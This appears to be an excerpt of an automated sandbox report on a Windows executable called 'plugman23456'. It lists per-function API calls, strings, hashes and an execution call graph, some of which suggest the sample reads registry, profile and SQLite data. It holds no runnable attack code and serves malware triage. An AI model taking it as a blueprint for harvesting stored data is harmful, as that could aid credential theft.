                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                          • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                          APIs
                          • memset.MSVCRT ref: 004144E7
                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                            • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                          • memset.MSVCRT ref: 0041451A
                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                          • String ID:
                          • API String ID: 1127616056-0
                          • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                          • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID: sqlite_master
                          • API String ID: 438689982-3163232059
                          • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                          • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                          • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                          • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                          APIs
                          • SHGetMalloc.SHELL32(?), ref: 00414D9A
                          • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                          • wcscpy.MSVCRT ref: 00414DF3
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: BrowseFolderFromListMallocPathwcscpy
                          • String ID:
                          • API String ID: 3917621476-0
                          • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                          • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                          • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                          • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                          APIs
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                          • _snwprintf.MSVCRT ref: 00410FE1
                          • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                          • _snwprintf.MSVCRT ref: 0041100C
                          • wcscat.MSVCRT ref: 0041101F
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                          • String ID:
                          • API String ID: 822687973-0
                          • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                          • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                          • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                          • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                          APIs
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                          • malloc.MSVCRT ref: 00417459
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                          • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                          Similarity
                          • API ID: ByteCharMultiWide$??3@malloc
                          • String ID:
                          • API String ID: 4284152360-0
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                          • RegisterClassW.USER32(?), ref: 00412428
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                          Similarity
                          • API ID: HandleModule$ClassCreateRegisterWindow
                          • String ID:
                          • API String ID: 2678498856-0
                          APIs
                          • GetDlgItem.USER32(?,?), ref: 00409B40
                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                          Similarity
                          • API ID: MessageSend$Item
                          • String ID:
                          • API String ID: 3888421826-0
                          APIs
                          • memset.MSVCRT ref: 00417B7B
                          • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                          • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                          • GetLastError.KERNEL32 ref: 00417BB5
                          Similarity
                          • API ID: File$ErrorLastLockUnlockmemset
                          • String ID:
                          • API String ID: 3727323765-0
                          APIs
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                          • malloc.MSVCRT ref: 00417407
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                          • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                          Similarity
                          • API ID: ByteCharMultiWide$??3@malloc
                          • String ID:
                          • API String ID: 4284152360-0
                          APIs
                          • memset.MSVCRT ref: 0040F673
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                          • strlen.MSVCRT ref: 0040F6A2
                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                          Similarity
                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                          • String ID:
                          • API String ID: 2754987064-0
                          APIs
                          • memset.MSVCRT ref: 0040F6E2
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                          • strlen.MSVCRT ref: 0040F70D
                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                          Similarity
                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                          • String ID:
                          • API String ID: 2754987064-0
                          APIs
                          • memset.MSVCRT ref: 00402FD7
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                          • strlen.MSVCRT ref: 00403006
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                          Similarity
                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                          • String ID:
                          • API String ID: 2754987064-0
                          APIs
                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                          • GetStockObject.GDI32(00000000), ref: 004143C6
                          Similarity
                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                          • String ID:
                          • API String ID: 764393265-0
                          APIs
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                          Similarity
                          • API ID: Time$System$File$LocalSpecific
                          • String ID:
                          • API String ID: 979780441-0
                          APIs
                          • memcpy.MSVCRT ref: 004134E0
                          • memcpy.MSVCRT ref: 004134F2
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                          Similarity
                          • API ID: memcpy$DialogHandleModuleParam
                          • String ID:
                          • API String ID: 1386444988-0
                          APIs
                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                          • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                          Similarity
                          • API ID: InvalidateMessageRectSend
                          • String ID: d=E
                          • API String ID: 909852535-3703654223
                          APIs
                          • wcschr.MSVCRT ref: 0040F79E
                          • wcschr.MSVCRT ref: 0040F7AC
                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                            • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                          Similarity
                          • API ID: wcschr$memcpywcslen
                          • String ID: "
                          • API String ID: 1983396471-123907689
                          APIs
                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                          • _memicmp.MSVCRT ref: 0040C00D
                          • memcpy.MSVCRT ref: 0040C024
                          Similarity
                          • API ID: FilePointer_memicmpmemcpy
                          • String ID: URL
                          • API String ID: 2108176848-3574463123
                          APIs
                          Similarity
                          • API ID: _snwprintfmemcpy
                          • String ID: %2.2X
                          • API String ID: 2789212964-323797159
                          APIs
                          Similarity
                          • API ID: _snwprintf
                          • String ID: %%-%d.%ds
                          • API String ID: 3988819677-2008345750
                          APIs
                          • memset.MSVCRT ref: 0040E770
                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                          Similarity
                          • API ID: MessageSendmemset
                          • String ID: F^@
                          • API String ID: 568519121-3652327722
                          APIs
                          Similarity
                          • API ID: PlacementWindowmemset
                          • String ID: WinPos
                          • API String ID: 4036792311-2823255486
                          APIs
                          Similarity
                          • API ID: ??3@DeleteObject
                          • String ID: r!A
                          • API String ID: 1103273653-628097481
                          APIs
                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                          • wcsrchr.MSVCRT ref: 0040DCE9
                          • wcscat.MSVCRT ref: 0040DCFF
                          Similarity
                          • API ID: FileModuleNamewcscatwcsrchr
                          • String ID: _lng.ini
                          • API String ID: 383090722-1948609170
                          APIs
                          Similarity
                          • API ID: memcpy$memset
                          • String ID:
                          • API String ID: 438689982-0
                          APIs
                          Similarity
                          • API ID: ??2@$memset
                          • String ID:
                          • API String ID: 1860491036-0
                          APIs
                          • memcmp.MSVCRT ref: 00408AF3
                            • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                          • memcmp.MSVCRT ref: 00408B2B
                          • memcmp.MSVCRT ref: 00408B5C
                          • memcpy.MSVCRT ref: 00408B79
                          Similarity
                          • API ID: memcmp$memcpy
                          • String ID:
                          • API String ID: 231171946-0
                          APIs
                          Similarity
                          • API ID: wcslen$wcscat$wcscpy
                          • String ID:
                          • API String ID: 1961120804-0

                          Execution Graph

                          Execution Coverage: 3%
                          Dynamic/Decrypted Code Coverage: 23%
                          Signature Coverage: 0.5%
                          Total number of Nodes: 966
                          Total number of Limit Nodes: 15
                          execution_graph 34259 40fc40 70 API calls 34434 403640 21 API calls 34260 427fa4 42 API calls 34435 412e43 _endthreadex 34436 425115 76 API calls __fprintf_l 34437 43fe40 133 API calls 34263 425115 83 API calls __fprintf_l 34264 401445 memcpy memcpy DialogBoxParamA 34265 440c40 34 API calls 33237 444c4a 33256 444e38 33237->33256 33239 444c56 GetModuleHandleA 33240 444c68 __set_app_type __p__fmode __p__commode 33239->33240 33242 444cfa 33240->33242 33243 444d02 __setusermatherr 33242->33243 33244 444d0e 33242->33244 33243->33244 33257 444e22 _controlfp 33244->33257 33246 444d13 _initterm __getmainargs _initterm 33247 444d6a GetStartupInfoA 33246->33247 33249 444d9e GetModuleHandleA 33247->33249 33258 40cf44 33249->33258 33253 444dcf _cexit 33255 444e04 33253->33255 33254 444dc8 exit 33254->33253 33256->33239 33257->33246 33309 404a99 LoadLibraryA 33258->33309 33260 40cf60 33295 40cf64 33260->33295 33316 410d0e 33260->33316 33262 40cf6f 33320 40ccd7 ??2@YAPAXI 33262->33320 33264 40cf9b 33334 407cbc 33264->33334 33269 40cfc4 33352 409825 memset 33269->33352 33270 40cfd8 33357 4096f4 memset 33270->33357 33275 407e30 _strcmpi 33277 40cfee 33275->33277 33276 40d181 ??3@YAXPAX 33278 40d1b3 33276->33278 33279 40d19f DeleteObject 33276->33279 33281 40cff2 RegDeleteKeyA 33277->33281 33282 40d007 EnumResourceTypesA 33277->33282 33381 407948 ??3@YAXPAX ??3@YAXPAX 33278->33381 33279->33278 33281->33276 33284 40d047 33282->33284 33285 40d02f MessageBoxA 33282->33285 33283 40d1c4 33382 4080d4 33283->33382 33287 40d0a0 CoInitialize 33284->33287 33362 40ce70 33284->33362 33285->33276 33379 40cc26 strncat memset RegisterClassA CreateWindowExA 33287->33379 33293 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33380 40c256 PostMessageA 33293->33380 33295->33253 33295->33254 33296 40d061 ??3@YAXPAX 33296->33278 33299 40d084 DeleteObject 33296->33299 33297 40d09e 33297->33287 33299->33278 33301 40d0f9 GetMessageA 33302 40d17b CoUninitialize 33301->33302 33303 
40d10d 33301->33303 33302->33276 33304 40d113 TranslateAccelerator 33303->33304 33306 40d145 IsDialogMessage 33303->33306 33307 40d139 IsDialogMessage 33303->33307 33304->33303 33305 40d16d GetMessageA 33304->33305 33305->33302 33305->33304 33306->33305 33308 40d157 TranslateMessage DispatchMessageA 33306->33308 33307->33305 33307->33306 33308->33305 33310 404ac4 GetProcAddress 33309->33310 33312 404ae8 33309->33312 33311 404add FreeLibrary 33310->33311 33313 404ad4 33310->33313 33311->33312 33314 404b13 33312->33314 33315 404afc MessageBoxA 33312->33315 33313->33311 33314->33260 33315->33260 33317 410d17 LoadLibraryA 33316->33317 33318 410d3c 33316->33318 33317->33318 33319 410d2b GetProcAddress 33317->33319 33318->33262 33319->33318 33321 40cd08 ??2@YAPAXI 33320->33321 33323 40cd26 33321->33323 33324 40cd2d 33321->33324 33393 404025 6 API calls 33323->33393 33326 40cd66 33324->33326 33327 40cd59 DeleteObject 33324->33327 33386 407088 33326->33386 33327->33326 33329 40cd6b 33389 4019b5 33329->33389 33332 4019b5 strncat 33333 40cdbf _mbscpy 33332->33333 33333->33264 33395 407948 ??3@YAXPAX ??3@YAXPAX 33334->33395 33336 407e04 33396 407a55 33336->33396 33339 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33346 407cf7 33339->33346 33340 407ddc 33340->33336 33417 407a1f 33340->33417 33342 407d7a ??3@YAXPAX 33342->33346 33346->33336 33346->33339 33346->33340 33346->33342 33399 40796e strlen 33346->33399 33409 406f30 33346->33409 33347 40796e 7 API calls 33347->33336 33348 407e30 33349 407e38 33348->33349 33350 407e57 33348->33350 33349->33350 33351 407e41 _strcmpi 33349->33351 33350->33269 33350->33270 33351->33349 33351->33350 33422 4097ff 33352->33422 33354 409854 33427 409731 33354->33427 33358 4097ff 3 API calls 33357->33358 33359 409723 33358->33359 33447 40966c GetFileAttributesA GetPrivateProfileStringA _mbscpy _mbscpy GetPrivateProfileIntA 33359->33447 33361 40972b 33361->33275 33448 4023b2 33362->33448 33368 40ced3 33543 40cdda 7 API calls 33368->33543 33369 
40cece 33372 40cf3f 33369->33372 33489 40c3d0 memset GetModuleFileNameA strrchr 33369->33489 33372->33296 33372->33297 33375 40ceed 33517 40affa 33375->33517 33379->33293 33380->33301 33381->33283 33383 4080e1 33382->33383 33384 4080da ??3@YAXPAX 33382->33384 33385 407948 ??3@YAXPAX ??3@YAXPAX 33383->33385 33384->33383 33385->33295 33394 406fc7 memset _mbscpy 33386->33394 33388 40709f CreateFontIndirectA 33388->33329 33390 4019e1 33389->33390 33391 4019c2 strncat 33390->33391 33392 4019e5 memset LoadIconA 33390->33392 33391->33390 33392->33332 33393->33324 33394->33388 33395->33346 33397 407a65 33396->33397 33398 407a5b ??3@YAXPAX 33396->33398 33397->33348 33398->33397 33400 4079a1 33399->33400 33401 407998 ??3@YAXPAX 33399->33401 33403 406f30 3 API calls 33400->33403 33402 4079ab 33401->33402 33404 4079c4 33402->33404 33405 4079bb ??3@YAXPAX 33402->33405 33403->33402 33407 406f30 3 API calls 33404->33407 33406 4079d0 memcpy 33405->33406 33406->33346 33408 4079cf 33407->33408 33408->33406 33410 406f37 malloc 33409->33410 33411 406f7d 33409->33411 33413 406f73 33410->33413 33414 406f58 33410->33414 33411->33346 33413->33346 33415 406f6c ??3@YAXPAX 33414->33415 33416 406f5c memcpy 33414->33416 33415->33413 33416->33415 33418 407a38 33417->33418 33419 407a2d ??3@YAXPAX 33417->33419 33421 406f30 3 API calls 33418->33421 33420 407a43 33419->33420 33420->33347 33421->33420 33438 406f96 GetModuleFileNameA 33422->33438 33424 409805 strrchr 33425 409814 33424->33425 33426 409817 _mbscat 33424->33426 33425->33426 33426->33354 33439 44b090 33427->33439 33432 40930c 3 API calls 33433 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33432->33433 33434 4097c5 LoadStringA 33433->33434 33437 4097db 33434->33437 33436 4097f3 33436->33276 33437->33434 33437->33436 33446 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33437->33446 33438->33424 33440 40973e _mbscpy _mbscpy 33439->33440 33441 40930c 33440->33441 33442 44b090 33441->33442 33443 409319 
memset GetPrivateProfileStringA 33442->33443 33444 409374 33443->33444 33445 409364 WritePrivateProfileStringA 33443->33445 33444->33432 33445->33444 33446->33437 33447->33361 33544 409c1c 33448->33544 33451 401e69 memset 33583 410dbb 33451->33583 33454 401ec2 33614 4070e3 strlen _mbscat _mbscpy _mbscat 33454->33614 33455 401ed4 33599 406f81 GetFileAttributesA 33455->33599 33458 401ee6 strlen strlen 33460 401f15 33458->33460 33461 401f28 33458->33461 33615 4070e3 strlen _mbscat _mbscpy _mbscat 33460->33615 33600 406f81 GetFileAttributesA 33461->33600 33464 401f35 33601 401c31 33464->33601 33467 401f75 33613 410a9c RegOpenKeyExA 33467->33613 33468 401c31 7 API calls 33468->33467 33470 401f91 33471 402187 33470->33471 33472 401f9c memset 33470->33472 33474 402195 ExpandEnvironmentStringsA 33471->33474 33475 4021a8 _strcmpi 33471->33475 33616 410b62 RegEnumKeyExA 33472->33616 33625 406f81 GetFileAttributesA 33474->33625 33475->33368 33475->33369 33477 40217e RegCloseKey 33477->33471 33478 401fd9 atoi 33479 401fef memset memset sprintf 33478->33479 33487 401fc9 33478->33487 33617 410b1e 33479->33617 33482 402165 33482->33477 33483 406f81 GetFileAttributesA 33483->33487 33484 402076 memset memset strlen strlen 33484->33487 33485 4070e3 strlen _mbscat _mbscpy _mbscat 33485->33487 33486 4020dd strlen strlen 33486->33487 33487->33477 33487->33478 33487->33482 33487->33483 33487->33484 33487->33485 33487->33486 33488 402167 _mbscpy 33487->33488 33624 410b62 RegEnumKeyExA 33487->33624 33488->33477 33490 40c422 33489->33490 33491 40c425 _mbscat _mbscpy _mbscpy 33489->33491 33490->33491 33492 40c49d 33491->33492 33493 40c512 33492->33493 33494 40c502 GetWindowPlacement 33492->33494 33495 40c538 33493->33495 33646 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33493->33646 33494->33493 33639 409b31 33495->33639 33499 40ba28 33500 40ba87 33499->33500 33506 40ba3c 33499->33506 33649 406c62 LoadCursorA SetCursor 33500->33649 33502 40ba8c 33650 410a9c RegOpenKeyExA 
33502->33650 33651 4107f1 33502->33651 33654 410808 33502->33654 33658 404734 33502->33658 33666 404785 33502->33666 33669 403c16 33502->33669 33503 40ba43 _mbsicmp 33503->33506 33504 40baa0 33505 407e30 _strcmpi 33504->33505 33509 40bab0 33505->33509 33506->33500 33506->33503 33743 40b5e5 10 API calls 33506->33743 33507 40bafa SetCursor 33507->33375 33509->33507 33510 40baf1 qsort 33509->33510 33510->33507 34201 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33517->34201 33519 40b00e 33520 40b016 33519->33520 33521 40b01f GetStdHandle 33519->33521 34202 406d1a CreateFileA 33520->34202 33523 40b01c 33521->33523 33524 40b035 33523->33524 33525 40b12d 33523->33525 34203 406c62 LoadCursorA SetCursor 33524->34203 34207 406d77 9 API calls 33525->34207 33528 40b136 33538 40c580 33528->33538 33529 40b087 33536 40b0a1 33529->33536 34205 40a699 12 API calls 33529->34205 33530 40b042 33530->33529 33530->33536 34204 40a57c strlen WriteFile 33530->34204 33533 40b0d6 33534 40b116 CloseHandle 33533->33534 33535 40b11f SetCursor 33533->33535 33534->33535 33535->33528 33536->33533 34206 406d77 9 API calls 33536->34206 33539 40c597 33538->33539 33540 40c58b 33538->33540 33539->33372 34208 404156 33540->34208 33543->33369 33556 409a32 33544->33556 33547 409c80 memcpy memcpy 33548 409cda 33547->33548 33548->33547 33549 408db6 12 API calls 33548->33549 33550 409d18 ??2@YAPAXI ??2@YAPAXI 33548->33550 33549->33548 33551 409d8b 33550->33551 33553 409d54 ??2@YAPAXI 33550->33553 33566 409b9c 33551->33566 33553->33551 33555 4023c1 33555->33451 33557 409a44 33556->33557 33558 409a3d ??3@YAXPAX 33556->33558 33559 409a52 33557->33559 33560 409a4b ??3@YAXPAX 33557->33560 33558->33557 33561 409a63 33559->33561 33562 409a5c ??3@YAXPAX 33559->33562 33560->33559 33563 409a83 ??2@YAPAXI ??2@YAPAXI 33561->33563 33564 409a73 ??3@YAXPAX 33561->33564 33565 409a7c ??3@YAXPAX 33561->33565 33562->33561 33563->33547 33564->33565 33565->33563 33567 407a55 ??3@YAXPAX 33566->33567 33568 409ba5 33567->33568 33569 
407a55 ??3@YAXPAX 33568->33569 33570 409bad 33569->33570 33571 407a55 ??3@YAXPAX 33570->33571 33572 409bb5 33571->33572 33573 407a55 ??3@YAXPAX 33572->33573 33574 409bbd 33573->33574 33575 407a1f 4 API calls 33574->33575 33576 409bd0 33575->33576 33577 407a1f 4 API calls 33576->33577 33578 409bda 33577->33578 33579 407a1f 4 API calls 33578->33579 33580 409be4 33579->33580 33581 407a1f 4 API calls 33580->33581 33582 409bee 33581->33582 33582->33555 33584 410d0e 2 API calls 33583->33584 33585 410dca 33584->33585 33586 410dfd memset 33585->33586 33626 4070ae 33585->33626 33587 410e1d 33586->33587 33629 410a9c RegOpenKeyExA 33587->33629 33591 410dee SHGetSpecialFolderPathA 33592 401e9e strlen strlen 33591->33592 33592->33454 33592->33455 33593 410e4a 33594 410e7f _mbscpy 33593->33594 33630 410d3d _mbscpy 33593->33630 33594->33592 33596 410e5b 33631 410add RegQueryValueExA 33596->33631 33598 410e73 RegCloseKey 33598->33594 33599->33458 33600->33464 33632 410a9c RegOpenKeyExA 33601->33632 33603 401c4c 33604 401cad 33603->33604 33633 410add RegQueryValueExA 33603->33633 33604->33467 33604->33468 33606 401c6a 33607 401c71 strchr 33606->33607 33608 401ca4 RegCloseKey 33606->33608 33607->33608 33609 401c85 strchr 33607->33609 33608->33604 33609->33608 33610 401c94 33609->33610 33634 406f06 strlen 33610->33634 33612 401ca1 33612->33608 33613->33470 33614->33455 33615->33461 33616->33487 33637 410a9c RegOpenKeyExA 33617->33637 33619 410b34 33620 410b5d 33619->33620 33638 410add RegQueryValueExA 33619->33638 33620->33487 33622 410b4c RegCloseKey 33622->33620 33624->33487 33625->33475 33627 4070bd GetVersionExA 33626->33627 33628 4070ce 33626->33628 33627->33628 33628->33586 33628->33591 33629->33593 33630->33596 33631->33598 33632->33603 33633->33606 33635 406f17 33634->33635 33636 406f1a memcpy 33634->33636 33635->33636 33636->33612 33637->33619 33638->33622 33640 409b40 33639->33640 33642 409b4e 33639->33642 33647 409901 memset SendMessageA 33640->33647 33643 409b99 
33642->33643 33644 409b8b 33642->33644 33643->33499 33648 409868 SendMessageA 33644->33648 33646->33495 33647->33642 33648->33643 33649->33502 33650->33504 33652 410807 33651->33652 33653 4107fc FreeLibrary 33651->33653 33652->33504 33653->33652 33655 410816 33654->33655 33656 4107f1 FreeLibrary 33655->33656 33657 410825 33656->33657 33657->33504 33659 404785 FreeLibrary 33658->33659 33660 40473b LoadLibraryA 33659->33660 33661 40474c GetProcAddress 33660->33661 33664 40476e 33660->33664 33662 404764 33661->33662 33661->33664 33662->33664 33663 404781 33663->33504 33664->33663 33665 404785 FreeLibrary 33664->33665 33665->33663 33667 4047a3 33666->33667 33668 404799 FreeLibrary 33666->33668 33667->33504 33668->33667 33670 4107f1 FreeLibrary 33669->33670 33671 403c30 LoadLibraryA 33670->33671 33672 403c5e 33671->33672 33673 403c44 GetProcAddress 33671->33673 33674 4107f1 FreeLibrary 33672->33674 33675 403c6b 33672->33675 33673->33672 33674->33675 33676 404734 3 API calls 33675->33676 33677 403c86 33676->33677 33744 4036e5 33677->33744 33680 4036e5 27 API calls 33681 403c9a 33680->33681 33682 4036e5 27 API calls 33681->33682 33683 403ca4 33682->33683 33684 4036e5 27 API calls 33683->33684 33685 403cae 33684->33685 33756 4085d2 33685->33756 33693 403ce5 33694 403cf7 33693->33694 33942 402bd1 40 API calls 33693->33942 33802 410a9c RegOpenKeyExA 33694->33802 33697 403d0a 33698 403d1c 33697->33698 33943 402bd1 40 API calls 33697->33943 33803 402c5d 33698->33803 33702 4070ae GetVersionExA 33703 403d31 33702->33703 33821 410a9c RegOpenKeyExA 33703->33821 33705 403d51 33706 403d61 33705->33706 33822 402b22 memset 33705->33822 33831 410a9c RegOpenKeyExA 33706->33831 33709 403d87 33710 403d97 33709->33710 33711 402b22 47 API calls 33709->33711 33832 410a9c RegOpenKeyExA 33710->33832 33711->33710 33713 403dbd 33714 403dcd 33713->33714 33715 402b22 47 API calls 33713->33715 33716 410808 FreeLibrary 33714->33716 33715->33714 33717 403ddd 33716->33717 33718 404785 FreeLibrary 
33717->33718 33719 403de8 33718->33719 33833 402fdb 33719->33833 33722 402fdb 34 API calls 33723 403e00 33722->33723 33849 4032b7 33723->33849 33732 403e3b 33734 403e73 33732->33734 33735 403e46 _mbscpy 33732->33735 33896 40fb00 33734->33896 33945 40f334 334 API calls 33735->33945 33743->33506 33745 4037c5 33744->33745 33746 4036fb 33744->33746 33745->33680 33946 410863 UuidFromStringA UuidFromStringA 33746->33946 33749 403716 strchr 33749->33745 33750 403730 33749->33750 33950 4021b6 memset 33750->33950 33752 40373f _mbscpy _mbscpy strlen 33753 4037a4 _mbscpy 33752->33753 33754 403789 sprintf 33752->33754 33951 4023e5 16 API calls 33753->33951 33754->33753 33757 4085e2 33756->33757 33952 4082cd 11 API calls 33757->33952 33761 408600 33762 403cba 33761->33762 33763 40860b memset 33761->33763 33774 40821d 33762->33774 33955 410b62 RegEnumKeyExA 33763->33955 33765 4086d2 RegCloseKey 33765->33762 33767 408637 33767->33765 33768 40865c memset 33767->33768 33956 410a9c RegOpenKeyExA 33767->33956 33959 410b62 RegEnumKeyExA 33767->33959 33957 410add RegQueryValueExA 33768->33957 33771 408694 33958 40848b 10 API calls 33771->33958 33773 4086ab RegCloseKey 33773->33767 33960 410a9c RegOpenKeyExA 33774->33960 33776 40823f 33777 403cc6 33776->33777 33778 408246 memset 33776->33778 33786 4086e0 33777->33786 33961 410b62 RegEnumKeyExA 33778->33961 33780 4082bf RegCloseKey 33780->33777 33782 40826f 33782->33780 33962 410a9c RegOpenKeyExA 33782->33962 33963 4080ed 11 API calls 33782->33963 33964 410b62 